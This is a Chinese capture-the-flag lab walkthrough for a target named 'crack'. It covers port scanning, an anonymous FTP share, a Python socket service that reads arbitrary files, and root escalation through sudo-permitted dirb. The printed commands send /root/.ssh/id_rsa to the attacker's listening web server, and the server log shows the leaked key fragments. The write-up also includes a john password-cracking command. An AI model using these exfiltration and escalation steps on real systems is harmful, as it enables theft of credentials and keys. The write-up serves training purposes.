【靶场实战】socket客户端编写到sudo-dirb 提权

靶场实战

靶场介绍

crack

easy

python 脚本分析、socket了解、socket 客户端脚本编写、nc 使用、ftp 使用、sudo-dirb 提权、dirb 读取shadowid_rsa文件

信息收集

主机发现

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.240
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-14 23:40 EST
Nmap scan report for 192.168.1.240
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.158
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Jun 07  2023 upload [NSE: writeable]
4200/tcp  open  ssl/http ShellInABox
|_ssl-date: TLS randomness does not represent time
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after:  2043-06-02T10:20:13
12359/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     File to read:NOFile to read:
|   NULL: 
|_    File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.94%I=7%D=1/14%Time=65A4B747%P=x86_64-pc-linux-gnu%r(N
SF:ULL,D,"Filex20tox20read:")%r(GenericLines,1C,"Filex20tox20read:NOFi
SF:lex20tox20read:");
MAC Address: 08:00:27:77:7E:85 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 192.168.1.240

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.37 seconds

扫描端口后，发现只开了21、4200、12359，4200 端口是一个shell ,但是没有账号密码，只能先放着。21 端口则存在匿名访问，进入后发现存在一个脚本。

ftp> ls
229 Entering Extended Passive Mode (|||32009|)
150 Here comes the directory listing.
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py

这段代码是一个简单的Python服务器，它使用socket库来监听指定端口（在这个例子中是12359）上的连接请求，并接受文件读取请求。可以接收客户端发送的文件名，然后读取文件内容并发送回客户端。如果文件不存在，它会发送一个"NO"消息。也就是端口12359 这个服务。

┌──(root㉿kali)-[~]
└─# cat crack.py
import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = "NO"
while True:
try:
c.send('File to read:'.encode())
data = c.recv(1024)
file = (str(data, 'utf-8').strip())
filename = os.path.basename(file)
check = "/"+filename
if os.path.isfile(check) and os.path.isfile(file):
f = open(file,"r")
lines = f.readlines()
lines = str(lines)
lines = lines.encode()
c.send(lines)
else:
c.send(no.encode())
except ConnectionResetError:
pass

将尝试读取机器的 /etc/passwd 。我们创建一个名为 passwd 的文件，并将其上传到 ftp 上传文件夹。

成功读取到passwd 文件内容

为了方便我们可以直接使用nc 进行连接

nc 192.168.1.240 12359

权限获取

通过文件读取获取了用户名cris, 然后使用cris/cris 登录成功，获取系统权限。

权限提升

使用sudo -l 查看配置文件，dirb 具有root 的运行权限。玩过kali 的都知道dirb 是kali 内置的一款目录扫描工具。那么我们搞如何利用它进行提取呢。

1、在kali 上使用php 开启一个web 服务,或者使用python

php -S 0.0.0.0:12345
python -m http.server

2、使用dirb 进行扫描，密码则选择shadow文件，然后我们的web 端就会接受到shadow 文件

3、爆破shadow 文件，但是爆破失败了。

john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

尝试读取id_rsa 私钥

sudo -u root /usr/bin/dirb http://192.168.1.158:12345 /root/.ssh/id_rsa

└─# php -S 0.0.0.0:12345
[Mon Jan 15 03:09:37 2024] PHP 8.2.7 Development Server (http://0.0.0.0:12345) started
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 [404]: GET /randomfile1 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60856 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 [404]: GET /frand2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60870 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 [404]: GET /-----BEGIN - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60880 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 [404]: GET /b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60892 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 [404]: GET /NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60902 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 [404]: GET /b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60904 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 [404]: GET /xNQ8NxRO4/bC1v90lUrhyLi/ML5B4nak+5vLFJi8NlwXMQJ/xCWZg5+WOLduFp4VvHlwAf - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60916 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 [404]: GET /tDh2C+tJp2hqusW1jZRqSXspCfKLPt/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60932 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 [404]: GET //+FwJbMna8iPwmvK6n/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60934 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 [404]: GET /yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60950 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 [404]: GET /Kn2aZN/8xWAB+/t96TcXogtSbQw/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3/Cb34a/6v8c - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60956 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 [404]: GET /9rMjGl9HMZFDwswzAGrvPOeroVB/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60970 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 [404]: GET /EAAAGBAMQb0XtxB+u8vYyLdq8Gu/bbzw8Jm9lpmL/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60974 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 [404]: GET /Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:60990 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 [404]: GET /wtb/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32774 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 [404]: GET /arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP/hcCWzJ2vI - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32780 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 [404]: GET /j8Jryup/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32784 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 [404]: GET /b2FK7qDomlEWLqc7scNuUWqNEm/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf/MVg - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32796 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 [404]: GET /Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN/wm9+Gv+r/HPazIxpfRzGR - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32798 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 [404]: GET /Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32810 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 [404]: GET /3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32820 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 [404]: GET /m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa/ - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32832 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 [404]: GET /a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR/3uSMN - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32838 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 [404]: GET /peiKDzLI/Y+QcQku/7GmUIV4ugP0fjMnz/XcXqe6GVNX/gvNeT6WfKPCzcaXiF4I2i228u - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32840 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 [404]: GET /TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32850 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 [404]: GET /TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf/yUyK04a6mhFg3kJzsxE+iDOVH28D - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32854 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 [404]: GET /Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32860 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 [404]: GET /wQDlr9NWE6q1BovNNobebvw44NdBRQE/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32876 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 [404]: GET /0MoSXZXiC/0/CSfe6Je7unnIzhiA85jSe/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32886 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 [404]: GET /1ROwaN5uL26gIgtf/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32898 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 [404]: GET /WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32902 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 [404]: GET /0sTQ3d/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32916 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 [404]: GET /DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32928 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 [404]: GET /Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32940 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 [404]: GET //RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32952 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 [404]: GET /oxY6YRERurpcyYuSa/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32968 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 [404]: GET /2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32974 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 [404]: GET /6xpD9lHWyp+ocD/meYC7V8aio/W9VxL25NlYwdFyCgecd/rIJQ+tGPXoqXIKrf5lVrVtFC - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32980 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 [404]: GET /s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:32990 Closing
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 Accepted
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 [404]: GET /-----END - No such file or directory
[Mon Jan 15 03:10:11 2024] 192.168.1.240:33002 Closing

然后使用正则表达式去获取id_rsa，然后再按照私钥的格式处理一下得到一个完整的id_rsa.

cat id_rsa | grep -oP '(?<=GETs/).+?(?=s-sNossuch)' > id_rsa.bak

最后将id_rsa 复制或者下周到靶机，在本机里面使用id_rsa 成功登录到root 用户。

End

原文始发于微信公众号（贝雷帽SEC）：【靶场实战】socket客户端编写到sudo-dirb 提权